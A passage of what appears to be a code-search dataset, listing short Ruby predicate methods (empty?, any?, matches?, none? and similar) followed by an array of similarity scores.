"def empty?\n questions.empty? and\n answers.empty? and\n nameservers.empty? and\n additional_records.empty?\n end",
"def any?\n not blank?\n end",
"def matches(value)\n output, status = provider.run_unless_sql_command(value)\n output='0' unless status == 0\n\n result_count = output.strip.to_i\n self.debug(\"Found #{result_count} row(s) executing 'unless' clause\")\n result_count > 0\n end",
"def has_records? results\n not results.nil? and results.fetch('SearchResult', {}).fetch('Data', {}).fetch('Records', []).count > 0\n end",
"def empty?\n RECORDS.each do |name, _|\n return false unless @records[name].empty?\n end\n true\n end",
"def empty?\n filter.empty?\n end",
"def empty?\n return @records.empty? if loaded?\n\n c = count\n c.respond_to?(:zero?) ? c.zero? : c.empty?\n end",
"def result?\n !@result.equal?(NOT_SET)\n end",
"def not_found?\n has_errors? && !not_found_errors.empty?\n end",
"def empty?\n @count == 0\n end",
"def empty?\n @count == 0\n end",
"def empty?\n @count == 0\n end",
"def empty?\n @count == 0\n end",
"def empty?\n total_count == 0\n end",
"def empty?\n total_count == 0\n end",
"def empty?\n rules.empty?\n end",
"def has_response?\n if @answers.nil? then\n false\n else\n rc = false\n @answers.each do |answer| # loop through Answers\n if !answer.value.blank? then # any response is good enough\n rc = true\n break\n end\n end\n rc\n end\n end",
"def no_questions_matches_no_answers?\n num_questions = question_ids.length\n pre_fetched_answers = Answer\n .includes({ question: :question_format }, :question_options)\n .where(id: answer_ids)\n num_answers = pre_fetched_answers.reduce(0) do |m, a|\n if a.is_valid? \n m+=1\n end\n m\n end\n return num_questions == num_answers\n end",
"def empty?\n count.zero?\n end",
"def none?\n @value.to_s.empty? or /\\Anone\\z/io.match(@value.to_s)\n end",
"def empty?\n @records.empty?\n end",
"def empty?()\r\n\t\t@bottles.zero?\r\n\tend",
"def empty?\n @rules.empty?\n end",
"def no_missing?(values)\n not(any_missing?(values))\n end",
"def empty?\n self.responses.empty?\n end",
"def test_emptySkill\n f = SkillFilter.new()\n new_list = [].find_all{|x| f.apply(x)}\n return new_list.size == 0\n end",
"def any_oranges?\n @oranges.length > 0\n end",
"def any_oranges?\n @oranges.length > 0\n end",
"def any?\n !empty?\n end",
"def any?\n !empty?\n end",
"def similarities?\n !similarities.empty?\n end",
"def matches?(rendered)\n @rendered = rendered\n @failures = matchers.reject do |matcher|\n matcher.matches?(rendered)\n end\n\n @failures.empty?\n end",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def vulnerable?\n !@results.empty?\n end",
"def empty?\n return (@indexes.empty? and @segments_metadata.empty?)\n end",
"def found?\n return false if no_search\n\n id.present? || records.present?\n end",
"def empty?\n @exact.empty? && @list.empty?\n end",
"def exam_and_interview_result_exists\n !exam_result.blank? and !interview_result.blank?\n end",
"def empty?\n @total == 0\n end",
"def empty?\n return false\n end",
"def empty?\n record_count == 0\n end",
"def get_results\n # 1. if the search is blank do NOT run the search (handled in subclasses)\n !self.search_text.blank? && !self.search_query.blank? && !self.search_type.blank? && !self.search_locale.blank?\n end",
"def failed?\n solutions.empty?\n end",
"def empty?() end",
"def empty?() end",
"def empty?() end",
"def none_empty?\n !any_empty?\n end",
"def none_empty?\n !any_empty?\n end",
"def empty?\n _values.all?(&:empty?)\n end",
"def no_products_found_msg?\n msg_vis = get_el(doc.css(\"#outsidecontainer\"))\n return false unless msg_vis and msg_vis.css('@style').to_s.match(/display: inline/)\n msg = get_text(doc.css(\"#outsidecontainer #info\"))\n return true if (msg || '').match(/no matching results/i)\n return false\n end",
"def empty?\n self.count == 0\n end",
"def empty?\n self.count == 0\n end",
"def passed?\n results.each { |re| return false unless re[:passed] }\n true\n end",
"def matches\n @matches ||= []\n end",
"def check_for_no_results(hash_of_results)\n if hash_of_results[JSON_NUMBER_OF_RESULTS] == 0\n puts 'No results, try again'\n go\n end\n end",
"def blank?\n raw_response.blank? || total < 1\n end",
"def queries_empty? queries\n queries.blank?\n end",
"def empty?\n graph.query({subject: subject, predicate: RDF.first}).empty?\n end",
"def any_questions?\n @questions.length > 0\n end",
"def empty?\n false\n end",
"def present?\n results.any?\n end"
] | [
"0.7834877",
"0.7826205",
"0.75819826",
"0.74592906",
"0.7218907",
"0.71993864",
"0.7182467",
"0.7114309",
"0.70080775",
"0.69820714",
"0.671407",
"0.65172404",
"0.650716",
"0.64751863",
"0.6457733",
"0.642819",
"0.6427544",
"0.64200985",
"0.64139336",
"0.6396393",
"0.63804966",
"0.63661563",
"0.6340611",
"0.63133895",
"0.63133895",
"0.63133895",
"0.62927985",
"0.628693",
"0.62863725",
"0.62844634",
"0.62625",
"0.624944",
"0.62385464",
"0.6222769",
"0.6222769",
"0.62189496",
"0.6199322",
"0.6190134",
"0.6182571",
"0.6161559",
"0.6138808",
"0.61327845",
"0.61186945",
"0.6117039",
"0.6113573",
"0.6110668",
"0.6091368",
"0.60840553",
"0.6083817",
"0.6083817",
"0.6083817",
"0.6083817",
"0.60817784",
"0.60817784",
"0.6081573",
"0.60599303",
"0.6056511",
"0.6055926",
"0.6052334",
"0.6045073",
"0.6043733",
"0.60427135",
"0.603981",
"0.6038412",
"0.6033105",
"0.6032122",
"0.6032122",
"0.60304046",
"0.60304046",
"0.6028917",
"0.60288113",
"0.6026575",
"0.6022024",
"0.60170555",
"0.60163176",
"0.6008035",
"0.6007184",
"0.60068566",
"0.5994522",
"0.5987648",
"0.597834",
"0.597829",
"0.5976505",
"0.5976505",
"0.5976505",
"0.5952705",
"0.5952705",
"0.5950863",
"0.5941015",
"0.5939502",
"0.5939502",
"0.5938266",
"0.59377766",
"0.5936189",
"0.59350806",
"0.5930168",
"0.5929696",
"0.59192365",
"0.5914358",
"0.5911903"
] | 0.6741005 | 10 |
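The complementary case from the record above: `not_found?` is true when the internal collection is empty. Again a minimal sketch under the same assumed `FlagMatches` shape.

class FlagMatches
  def initialize(flags)
    @flags = flags
  end

  # Whether no matches were found.
  def not_found?
    @flags.empty?
  end
end

puts FlagMatches.new([]).not_found?                          # => true
puts FlagMatches.new([["--quiet", true, false]]).not_found?  # => false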
Whether multiple matches were found (i.e. ambiguous input). | def found_multiple?
@flags.size > 1
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def match?(given_names); end",
"def matched?( other = nil )\n return full? if other.nil?\n matches.include? other\n end",
"def multiple_search?\n\t\t@attempts > 1\n\tend",
"def multiple_match?\n acknowledgement_detail = locate_element(@original_body, ACKNOWLEDGEMENT_DETAIL_XPATH)\n return false unless acknowledgement_detail\n\n acknowledgement_detail.nodes.first == MULTIPLE_MATCHES_FOUND\n end",
"def multiple?(term)\n self.class.multiple?(term)\n end",
"def is_a_match(total_in_common)\n total_in_common >= 2 ? true : false\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def match_args(results, queries)\n queries.map do |query|\n (results.any? { |r| r.to_s.match(query) } ? 1 : nil)\n end.compact\n end",
"def match_all?\n self.class.array_matching == :all\n end",
"def maybe_matching(ingredient_long_name,item)\n return (item.downcase.split(\" \") & ingredient_long_name.split(\" \")).size >= 1\nend",
"def term_multiple?( term )\n #puts \"=====> GenericWork.term_multiple? #{term}\"\n return true if [:keyword, :title, :contributor, :subject, :related_url, :sponsoring_agency, :admin_notes].include? term\n false\n end",
"def probable_matching(ingredient_long_name,item)\n return (item.downcase.split(\" \") & ingredient_long_name.split(\" \")).size >= 2\nend",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def is_multimatch(s)\n return s.match(/[*?]/)\n end",
"def matched?\n !failed?\n end",
"def several?\n several = (count > 1) if several.nil?\n end",
"def exact_matches(guess)\n pegs.zip(guess.pegs).count { |a, b| a == b }\n end",
"def accept_multiple_sets?\n return true\n end",
"def found_exact?\n @found_exact\n end",
"def is_wanted?(match_all = false)\n # puts \"Checking if item is wanted.\"\n wants_count = 0\n match_count = 0\n\n self.attrs.each do |attr|\n if (!attr[:want].nil?)\n # puts \"Want value(s) specified on #{attr[:title]} (#{attr[:value]}): #{attr[:want]}\"\n wants_count += 1\n\n attr[:want].each do |want_val|\n # If the value is quoted, match it exactly.\n if ((want_val[0] == '\"') ||\n (want_val[0] == \"'\"))\n quote = want_val[0]\n if (want_val[(want_val.length - 1)] == quote)\n # puts \"Value #{want_val} is quoted.\"\n if (attr[:value].downcase == want_val[1..(want_val.length - 2)].downcase)\n # puts \"Matches.\"\n match_count += 1\n else\n # puts \"Doesn't match.\"\n end\n elsif (attr[:value].downcase.include?(want_val.downcase))\n # puts \"Matches (loose / 1).\"\n match_count += 1\n else\n # puts \"Doesn't match.\"\n end\n elsif (attr[:value].downcase.include?(want_val.downcase))\n # puts \"Matches (loose / 2).\"\n match_count += 1\n end\n end\n end\n end\n\n # puts \"Wanted? #{wants_count} & #{match_count}\"\n if match_all\n return (wants_count == match_count)\n else\n return ((wants_count == 0) || (match_count > 0))\n end\n end",
"def matches?\n symbol = @actual.is_a?(Symbol)\n actual = symbol ? @actual.to_s : @actual\n values = symbol ? @values.map { |v| v.is_a?(Symbol) ? v.to_s : v } : @values\n\n values.each do |value|\n return false unless actual.include?(value)\n end\n\n true\n end",
"def exact_match?\n !partial_match?\n end",
"def exact_match?(arguments, keyword_arguments)\n definition.exact_match?(arguments, keyword_arguments)\n end",
"def multiple?; end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def matches?(candidates)\n candidates.any? && candidates.all? { |l| @languages.include?(l.name) }\n end",
"def exact_matches\n matches = 0\n 4.times{ |x| matches += 1 if @num_guess[x] == @code[x] }\n matches\n end",
"def matches(smarts_or_string, uniq=true)\n each_match(smarts_or_string, uniq).map.to_a\n end",
"def multiple?\n @multiple\n end",
"def is_match?(value)\n\t\t\tpattern_groups = group_patterns\n\t\t\tif pattern_groups[:negatives].empty?\n\t\t\t\tnegatives = true\n\t\t\telse\n\t\t\t\tnegatives = pattern_groups[:negatives].all? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\tif pattern_groups[:positives].empty?\n\t\t\t\tpositives = true\n\t\t\telse\n\t\t\t\tpositives = pattern_groups[:positives].any? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\treturn false if pattern_groups[:positives].empty? && pattern_groups[:negatives].empty?\n\t\t\treturn positives && negatives\n\t\tend",
"def verb_correct? set\n (set & VERBS).count >= 1\n end",
"def all_words_valid? set\n (set & DICTIONARY) == set\n end",
"def match?(*token_types)\n token_types.each do |type|\n if check?(type)\n advance\n return true\n end\n end\n\n return false\n end",
"def validate_matches\n return success unless (@matched_ids.present? || @unmatched_ids.present?)\n\n # common ids in matches_ids and unmatched_ids\n r = validate_matched_unmatched_records\n return r unless r.success?\n\n success\n\n end",
"def check_repeated_choice guess\r\n\t\t\t\t\t@resultb.include? guess\r\n\t\t\t\tend",
"def multiple?(field_key)\n true\n end",
"def match?\n false\n end",
"def define_match_any_of\n klass.send(:define_method, :match_any_of) do |tags|\n if tags.empty?\n str(\"\")\n else\n tags.map { |tag| str(tag) }.inject do |tag_chain, tag|\n tag_chain.send :|, tag\n end\n end\n end\n end",
"def match_array(input)\n case input\n in [a, b, c]\n \"matching - #{a}, #{b}, #{c}\"\n else\n \"no match\"\n end\nend",
"def full_house?\n matched = self.matched_cards\n found_pair = false\n found_three = false\n for rank, matches in matched do\n found_pair = true if matches.count == 2\n found_three = true if matches.count == 3\n end\n return found_pair && found_three \n end",
"def supports_multiple?(type)\n rules_for_type(type).include?(:multiple)\n end",
"def matches?(actual)\n @matching_values.include?(actual)\n end",
"def allwords?\n vowels = 'aeiouy'\n words1 = @input1.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\" \")\n words2 = @input2.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\" \")\n if\n words1.all? {|str| str.count(vowels) >= 1} && words2.all? {|str| str.count(vowels) >= 1}\n return true\n else\n return \"You need to input actual words!\"\n end\n end",
"def tag_match_found(option_tags, aws_tags)\n option_tags.each do | option_tag |\n aws_tags.each do | aws_tag | \n if option_tag[:key].downcase == aws_tag[:key].downcase and option_tag[:value].downcase == aws_tag[:value].downcase\n return true\n end\n end\n end\n\n return false\nend",
"def use_multiple?(results)\n if(results.class.to_s == 'Array' && results[0].class.superclass.to_s == 'ActiveRecord::Base')\n return true\n end\n false\n end",
"def one_result\n matched_combined = @matched_names.ids + @matched_tags.ids +\n @matched_queries.ids + @matched_creator.ids +\n @matched_modifier.ids\n return Asq.find(matched_combined[0]) if matched_combined.length == 1\n false\n end",
"def got_three?(arr)\n !!(arr.map(&:to_s).join =~ /(.)\\1\\1/)\nend",
"def matches?(sequence)\n (0..(sequence.size-length)).each do |pos|\n return pos if matches_at?(pos, sequence)\n end\n return false\n end",
"def check?(input)\n\t\t@response_list.keys.any? do |to_match|\n\t\t\twords = to_match.split\n\t\t\twords.any? { |word| input.split.include? word }\n\t\tend\n\tend",
"def exact_matches(other_code)\n exact_matches = 0\n @seq.each_with_index do |letter, index|\n exact_matches += 1 if self.is_exact_match?(other_code, index)\n end\n exact_matches\n end",
"def match(*list)\n @match.concat(makelist(list)) unless list.empty?\n @match\n end",
"def winner?\n (self.array & [\"a1\",\"a2\",\"a3\"]).length == 3 || (self.array & [\"b1\",\"b2\",\"b3\"]).length == 3 || (self.array & [\"c1\",\"c2\",\"c3\"]).length == 3 || (self.array & [\"a1\",\"b1\",\"c1\"]).length == 3 || (self.array & [\"a2\",\"b2\",\"c2\"]).length == 3 || (self.array & [\"a3\",\"b3\",\"c3\"]).length == 3 || (self.array & [\"a1\",\"b2\",\"c3\"]).length == 3 || (self.array & [\"c1\",\"b2\",\"a3\"]).length == 3\n end",
"def my_all?(arg = nil)\n all_matched = true\n my_each do |val|\n if block_given?\n all_matched = false unless yield(val)\n elsif arg.nil?\n all_matched = false unless val\n else\n all_matched = false unless arg === val\n end\n end\n all_matched\n end",
"def check_input(input, values)\n input_ok = false\n values.each do |value|\n input_ok = true if input.include?(value)\n end\n return input_ok\nend",
"def ambiguous?\n found = chart.sets.find { |set| !set.ambiguities.empty? }\n !found.nil?\n end",
"def includes_all? *args\n args.all? { |arg| include? arg }\n end",
"def my_any? looking_for\n output = false\n self.my_each {|item| output = true if item == looking_for}\n output\n end",
"def match?(args)\n if @matchers.empty?\n @logger.log_if_debug('[CombiningMatcher] Matchers Empty')\n return false\n end\n\n case @combiner\n when Combiners::AND\n matches = eval_and(args)\n @logger.log_if_debug(\"[CombiningMatcher] Combiner AND result -> #{matches}\")\n return matches\n else\n @logger.log_if_debug(\"[CombiningMatcher] Invalid Combiner Type - Combiner -> #{@combiner}\")\n @logger.error('Invalid combiner type')\n end\n\n false\n end",
"def include_one_of?(other)\n unless other.collect {|string| true if self.include_string? string}.compact.blank?\n return true\n else\n return false\n end\n end",
"def two_candidates?\n @candidates.count == 2\n end",
"def include_any?(arr, arr2)\n #good for large sets w/ few matches\n # Set.new(self).intersection(arr).empty?\n arr2.any? {|e| arr.include?(e) }\n end",
"def member_of_group?(*names)\n @group_names && @group_names.intersect?(names.to_set) \n end",
"def any_of(*args)\n [:any_of, args]\n end",
"def isSet? card_arr\n return false if card_arr.size != 3\n color_arr = [card_arr[0][0], card_arr[1][0], card_arr[2][0]]\n shape_arr = [card_arr[0][1], card_arr[1][1], card_arr[2][1]]\n num_arr = [card_arr[0][2], card_arr[1][2], card_arr[2][2]]\n shade_arr = [card_arr[0][3], card_arr[1][3], card_arr[2][3]]\n same_or_dif?(color_arr) && same_or_dif?(shape_arr) && same_or_dif?(num_arr) && same_or_dif?(shade_arr)\nend",
"def pair_not_overlapping?\n !(self.match(/([a-z][a-z]).*\\1/)).nil?\n end",
"def tag_match?(tags, tag_patterns, last_only)\n if last_only\n tags.last.match(Regexp.new(tag_patterns.last))\n else\n return false if tags.count != tag_patterns.count\n all_match = true\n tags.each_with_index do |tag, i|\n unless tag.match(Regexp.new(tag_patterns[i]))\n all_match = false\n break\n end\n end\n all_match\n end\n end",
"def must_unify?(seq1, seq2)\n unique_selectors = seq1.map do |sseq|\n next [] if sseq.is_a?(String)\n sseq.members.select {|sel| sel.unique?}\n end.flatten.to_set\n\n return false if unique_selectors.empty?\n\n seq2.any? do |sseq|\n next false if sseq.is_a?(String)\n sseq.members.any? do |sel|\n next unless sel.unique?\n unique_selectors.include?(sel)\n end\n end\n end",
"def match(*token_types)\n token_types.each do |token_type|\n if check?(token_type)\n advance\n return true\n end\n end\n false\n end",
"def multiples?\n @maxOccurs == nil || 1 < @maxOccurs\n end",
"def match?(instance)\n match_id?(instance) || match_percentage?(instance) || match_groups?(instance)\n end",
"def one_match?(candidate_categories, result_age = nil)\n return false unless candidate_categories.one?\n\n candidate_category = candidate_categories.first\n match = candidate_category.include? self, result_age\n debug \"one_match? #{match}\"\n match\n end",
"def noun_articles_correct? set\n ((set & NOUNS).count >= 1) || ((set & ARTICLES).count >= 2)\n end",
"def any_results?\n races.any?(&:any_results?)\n end",
"def is_one_of?(*syms)\n syms.flatten.include?(to_sym)\n end",
"def check_three_and_two(arr)\n answer = Hash.new\n arr.each { |x| answer[x] = arr.count(x)}\n if answer.keys.count == 2 && (answer.values.include?(2) && answer.values.include?(3))\n p true\n else\n p false\n end\nend",
"def multiple?(type)\n (type.is_a?(Array) || type.is_a?(Set)) && type.size > 1\n end",
"def match?(choices)\n\n @choices = choices\n raise ArgumentError, 'Checker received non-card input' unless @choices.kind_of?(Array)\n raise ArgumentError, 'A set has 3 cards! Please select 3 cards!' unless @choices.size == 3\n\n # Logic: \"MAKE THIS TERSE\"\n numbers = Array.new(3) { |i| choices[i].number }\n symbols = Array.new(3) { |i| choices[i].symbol }\n shadings = Array.new(3) { |i| choices[i].shading }\n colors = Array.new(3) { |i| choices[i].color }\n\n features = [numbers, symbols, shadings, colors]\n @result = features.all? { |feature| feature.uniq.size != 2 }\n end",
"def multiple?(field)\n self.class.multiple?(field)\n end",
"def is_found_exactly_in?(array_of_courses)\n # Define the list of attributes to match. This list must be updated regularly.\n key_attributes = [\n \"crn\",\n \"gwid\",\n \"section\",\n \"course_name\",\n \"hours\",\n \"days\",\n \"day1_start\",\n \"day1_end\",\n \"day2_start\",\n \"day2_end\",\n \"day3_start\",\n \"day3_end\",\n \"day4_start\",\n \"day4_end\",\n \"day5_start\",\n \"day5_end\",\n \"day6_start\",\n \"day6_end\",\n \"day7_start\",\n \"day7_end\",\n \"llm_only\",\n \"jd_only\",\n \"course_name_2\",\n \"alt_schedule\",\n \"additional_info\",\n \"professor\",\n \"prof_id\",\n \"final_time\",\n \"final_date\",\n \"school\"\n ]\n return Scraper.deep_match_course_attributes(key_attributes, self, array_of_courses)\n end",
"def matches?(input_string)\n @word_list.include? input_string\n end",
"def multiple?\n @multi\n end",
"def multiple?\n @multi\n end",
"def in_all_strings?(long_strings, substring)\n long_strings.map do |str|\n str.split.any?(substring)\n end.all?(true)\nend",
"def matches?(value, context); end",
"def in_all_strings?(long_strings, short_string)\n long_strings.all? do |long_string|\n long_string.include?(short_string)\n end\nend",
"def matches(str)\n each_match(str).to_a\n end",
"def has_match?(p1, p2)\n\t\t! (Match[:p1_id => p1.id, :p2_id => p2.id] or Match[:p2_id => p1.id, :p1_id => p2.id]).nil?\n\tend",
"def got_three? array\n\tarray.each.with_index{|x,i| return true if (x == array[i+1] && x == array[i+2])}\n\treturn false\nend",
"def test_token_ambiguity\n @tokens.keys.each{|i|\n @tokens.keys.each{|j|\n if(i!=j) then\n ti = @tokens[i]\n tj = @tokens[j]\n\n # Loop over all possible values for each given token\n ti.each{|tiv|\n tj.each{|tjv|\n return true if tiv[0..Math::min(tiv.length, tjv.length)-1] == tjv[0..Math::min(tiv.length, tjv.length)-1]\n }\n }\n end\n }\n }\n return false\n end",
"def repeated?(guessed_char, running_guess, misses)\n guess_downcase = guessed_char.downcase\n running_guess.include?(guess_downcase) || misses.include?(guess_downcase)\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def multiple?\r\n not single?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def contains_all?(other)\n (other & self) == self\n end",
"def match?\n patterns.each do |pattern|\n result = if pattern.respond_to? :yield\n pattern.yield element\n else\n element.to_s.scan(pattern).flatten\n end\n\n unless result.nil? || result.empty?\n @pattern = pattern\n @match = result\n return true\n end\n end\n\n @pattern = nil\n @match = nil\n false\n end",
"def any_two?\n results=[]\n [@hand1Values, @hand2Values].each do |handV|\n freqHash = Hash.new(0)\n handV.each { |h| freqHash[h] += 1}\n results << freqHash.values.any? { |freq| freq >= 2}\n end\n\n results\n end",
"def exact_matches(loc=@counter)\n matches = 0\n 4.times{ |x| matches += 1 if @guessgrid[loc][x] == @code[x] }\n matches\n end",
"def compound_query?\n @split_query_strings.size > 1\n end",
"def dup_args_ms(arr)\n arr.any? {|e| arr.count(e) > 1} ? true : false\nend"
] | [
"0.6815673",
"0.6742606",
"0.6726413",
"0.6694285",
"0.6620158",
"0.6601435",
"0.6599376",
"0.6591933",
"0.6579682",
"0.6571317",
"0.64545715",
"0.6444007",
"0.64392936",
"0.6410695",
"0.63753486",
"0.6371641",
"0.6356452",
"0.62906396",
"0.62896234",
"0.628535",
"0.6248091",
"0.6223291",
"0.61928195",
"0.6180809",
"0.61788476",
"0.6172857",
"0.613986",
"0.6124676",
"0.6088994",
"0.60751015",
"0.60674334",
"0.6053252",
"0.60461944",
"0.6017838",
"0.60170275",
"0.60131013",
"0.6012454",
"0.60076916",
"0.5994914",
"0.5986497",
"0.59862584",
"0.59840673",
"0.59807545",
"0.5980647",
"0.5978101",
"0.5973897",
"0.5965355",
"0.59596646",
"0.5948644",
"0.59470344",
"0.5945101",
"0.5938067",
"0.5935619",
"0.59278",
"0.5927447",
"0.59050125",
"0.5890909",
"0.58798695",
"0.58761173",
"0.58708876",
"0.587065",
"0.5862541",
"0.5854867",
"0.58519673",
"0.58360267",
"0.58347785",
"0.5828068",
"0.58167696",
"0.5813285",
"0.5805914",
"0.5797466",
"0.5795772",
"0.57875514",
"0.5783559",
"0.5783096",
"0.57818675",
"0.5773264",
"0.5767506",
"0.57585686",
"0.57555956",
"0.5751964",
"0.5751964",
"0.575074",
"0.575063",
"0.57471806",
"0.57429814",
"0.57347405",
"0.57340735",
"0.57330346",
"0.57321244",
"0.5728402",
"0.5728337",
"0.5721202",
"0.5721202",
"0.5718882",
"0.57128036",
"0.5711942",
"0.57107884",
"0.57070696",
"0.5703976"
] | 0.7021841 | 0 |
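A sketch tying together the `found_multiple?` record above and its companion `unique_flag_negative?` from the next record: more than one stored flag signals ambiguous input, and the third tuple slot records whether a unique hit was the negated (`no`) form. Class, tuple layout, and sample data are hypothetical.

class FlagMatches
  def initialize(flags)
    @flags = flags
  end

  def found_unique?
    @flags.size == 1
  end

  # Whether multiple matches were found (i.e. ambiguous input).
  def found_multiple?
    @flags.size > 1
  end

  # true/false for the negated (`no`) case when unique, else nil.
  def unique_flag_negative?
    found_unique? ? @flags.first[2] : nil
  end
end

m = FlagMatches.new([["--color", true, false], ["--no-color", false, true]])
puts m.found_multiple?                                                    # => true
puts FlagMatches.new([["--no-color", false, true]]).unique_flag_negative? # => true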
Return whether the unique match was a hit on the negative (`no`) case, or `nil` if not found or not unique. | def unique_flag_negative?
found_unique? ? @flags.first[2] : nil
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matched?\n not @match.equal?(nil)\n end",
"def not_a_match(no)\n if no == false\n @e += 1 \n else nil \n end\n end",
"def found_unique?\n @flags.size == 1\n end",
"def match?\n false\n end",
"def has?(arg)\n !!find(arg)\n end",
"def opt_unique?(str)\n\texists = {}\n\tfor i in 0..str.length-1\n\t\tif exists[str[i]]\n\t\t\treturn false\n\t\telse\n\t\t\texists[str[i]] = true\n\t\tend\n\tend\n\ttrue\nend",
"def unique?\n !! @unique\n end",
"def check_unique\n bar = Bar.where(:name => self.name, :user_id => self.user_id)\n if bar != nil\n \treturn false\n end\n end",
"def negative_match?(rule, search_criteria)\n rule.criteria.any? do |criterium, values|\n values.is_a?(Hash) && values[:not]&.any?(search_criteria[criterium])\n end\n end",
"def found_exact?\n @found_exact\n end",
"def not_found(u, a)\n f = true\n\t\ta.each do |ss|\n\t\t\tif ss[\"user_id\"] == u\n\t\t\t\tf = false\n\t\t\t\tbreak\n\t\t\tend\n\t\tend\n\t\treturn f\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def unique?\r\n @opts[:unique]\r\n end",
"def unique?\n @unique\n end",
"def hit_or_miss\n\t\t\treturn :win if value = svalue\n\t\t\treturn :miss if value = none_empty\n\t\tend",
"def nil?\n @matches.nil?\n end",
"def unique?\n if @data.fetch(:Index_type) == \"UNIQUE\" || @data.fetch(:Non_unique).to_i == 0\n return true\n else\n return false\n end\n end",
"def unique?\n return @data[\"unique\"]==true\n end",
"def unique?(name)\n tgts = resolve_mapping(name)\n targets = tgts.is_a?(Array) ? tgts : find(tgts)\n targets.size == 1\n end",
"def what_is_unique?\n cache_options[:unique].to_s =~ /true|false/\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def unique?\n false\n end",
"def unique?\n @unique\n end",
"def unique?\n @unique\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def unique?\n if defined?(@unique)\n @unique\n else\n true\n end\n end",
"def uniq?(uniq)\n { 'false': false, 'true': true }[uniq.to_sym]\n end",
"def missing_one_at_either_end\n [2,3].each { |i|\n return true if @counts[i]>0 && @counts[i+1]>0 && @counts[i+2]>0\n }\n return false\n end",
"def find?\n find_duplicate.nil?\n end",
"def mapsUnique?()\n return false unless passed_filter?\n return false if unmapped_Ns? || unmapped?\n if @chrom =~ /^\\d+:\\d+:\\d+$/\n false\n else\n true\n end\n end",
"def unique?(field)\n !multiple?(field)\n end",
"def matched?\n !failed?\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def unique?\n self[:unique] ? true : false\n end",
"def exists?\n return @x != -999\n end",
"def exact_match?\n !partial_match?\n end",
"def exact_match_string\n @matches.nil? ? nil : @matches[0]\n end",
"def unique_val?\n @lower == @upper\n end",
"def my_none?(pattern = nil)\n test = true\n if (block_given?)\n self.my_each do |x|\n test = test && !yield(x)\n end\n else\n if(pattern.nil?)\n self.my_each do |x|\n test = test && (x==false)\n end\n else\n self.my_each do |x|\n test = test && !x.match?(pattern)\n end\n end\n end\n return test\n end",
"def no_match() \n if $match_index_arr == []\n $turns = $turns - 1\n $index = $index + 1\n end\n end",
"def matched?( other = nil )\n return full? if other.nil?\n matches.include? other\n end",
"def unique?\n if @args[:data][:Index_type] == \"UNIQUE\"\n return true\n else\n return false\n end\n end",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def is_unambiguous?\n RANKS.each do |r|\n if !send(r).nil?\n return false unless !send(r).nil? && !unambiguous_at?(r).nil?\n end\n end\n true\n end",
"def missing_one_in_middle\n regex1 = /[1-6]x[1-6][1-6]/ # example: \" x23x5x\"\n regex2 = /[1-6][1-6]x[1-6]/ # example: \" x2x45x\"\n return ( @distribution.match(regex1) || @distribution.match(regex2) )\n=begin\n [1,2,3].each { |i| \n return true if @counts[i]>0 && @counts[i+1]==0 && counts[i+2]>0 && counts[i+3]>0\n return true if @counts[i]>0 && @counts[i+1]>0 && counts[i+2]==0 && counts[i+3]>0\n }\n return false\n=end\n end",
"def positive_match?(rule, search_criteria)\n rule.criteria.all? do |criterium, values|\n values = case values\n when Hash\n values[:or] || []\n when String\n [values]\n else\n values\n end\n\n # Always treat 'group' criterium (ignored) and the wildcard as matching\n criterium == 'group' || values == ['any'] || values.nil? || values.any?(search_criteria[criterium])\n end\n end",
"def unique_key? object\n _check = self.find(object.key)\n _unique = !_check || _check != object\n end",
"def my_none? (pattern = false)\n if block_given?\n self.my_each{|item| return false if yield item}\n elsif !!pattern == true\n self.my_each{|item| return false if pattern === item}\n else\n self.my_each{|item| return false if !!item}\n end\n true\n end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def most_likely_duplicate\n possible_matching_people.first\n end",
"def is_unique?(str)\n\nend",
"def exists? value\n !self[index_of(value)].nil?\n end",
"def exists? value\n !self[index_of(value)].nil?\n end",
"def has_match?(p1, p2)\n\t\t! (Match[:p1_id => p1.id, :p2_id => p2.id] or Match[:p2_id => p1.id, :p1_id => p2.id]).nil?\n\tend",
"def is_false_duplicate?\n payment_complete? && has_completed_duplicates?\n end",
"def match_without_pinning(input)\n case input\n in [a, a] # We'd like to assert that the first and second elements are equal\n a\n else\n '-'\n end\nend",
"def expects_none?\n count_specified? ? matches_count?(0) : false\n end",
"def found?\n\t\t\t!!@found\n\t\tend",
"def is_matched(ind)\n\t\treturn @tile_Array[ind].return_match\n\tend",
"def unique?\n indexes.any?{|i| i.unique}\n end",
"def get_no_match_score(input)\n n, o = input.split('')\n\n score = 0\n score += N_MATCH.fetch(n) if N_MATCH.key?(n)\n score += O_MATCH.fetch(o) if O_MATCH.key?(o)\n score\n end",
"def hit_miss(slot, tag)\n if slot.tag == tag and slot.is_valid == 1\n return \"hit\"\n else\n return \"miss\"\n end\n end",
"def [](n)\n @matched ? @matches[n] : nil\n end",
"def none?\n @value.to_s.empty? or /\\Anone\\z/io.match(@value.to_s)\n end",
